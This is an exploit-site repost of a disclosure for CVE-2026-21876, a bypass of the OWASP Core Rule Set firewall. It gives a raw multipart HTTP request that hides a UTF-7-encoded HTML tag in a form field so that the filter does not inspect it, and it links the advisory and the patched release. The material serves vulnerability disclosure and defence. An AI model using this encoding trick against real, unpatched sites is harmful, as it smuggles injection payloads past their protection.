Share
## https://sploitus.com/exploit?id=PACKETSTORM:216009
# CVE-2026-21876 (OWASP CRS WAF bypass)
    CVE-2026-21876 docker container + minimal PoC.
    
    I would like to thank [@airween](https://github.com/airween) and [@fzipi](https://github.com/fzipi) separately for their quick response! The vulnerability fix was ready in a very short time.
    # PoC
    ```
    POST /submit HTTP/1.1
    Host: localhost
    User-Agent: curl/8.17.0
    Accept: */*
    Origin: https://example.com
    Content-Length: 367
    Content-Type: multipart/form-data; boundary=------------------------cmOi6twNhVJDu76bOwDTVz
    
    --------------------------cmOi6twNhVJDu76bOwDTVz
    Content-Disposition: form-data; name="username"
    Content-Type: text/plain; charset=utf-7
    
    +ADw-img+ACA-src+AD0-x+AD4-
    --------------------------cmOi6twNhVJDu76bOwDTVz
    Content-Disposition: form-data; name="dummy"
    Content-Type: text/plain; charset=utf-8
    
    dummy
    --------------------------cmOi6twNhVJDu76bOwDTVz--
    ```
    The `username` value is not checked for characters that are not included in the whitelist, which leads to WAF bypass.
    # Bypass demo
    <img width="1840" height="932" alt="изображение" src="https://github.com/user-attachments/assets/163628c0-19da-4a95-bbac-c85a7b9fbd7c" />
    
    # The same payload is blocked here
    <img width="2076" height="658" alt="изображение" src="https://github.com/user-attachments/assets/1f4525d4-41a0-4d59-9538-77ac5de42caa" />
    
    # References
    - [Github security advisory](https://github.com/coreruleset/coreruleset/security/advisories/GHSA-36fv-25j3-r2c5)
    - [OWASP CRS walkthrough blogpost](https://coreruleset.org/20260106/cve-2026-21876-critical-multipart-charset-bypass-fixed-in-crs-4.22.0-and-3.3.8/)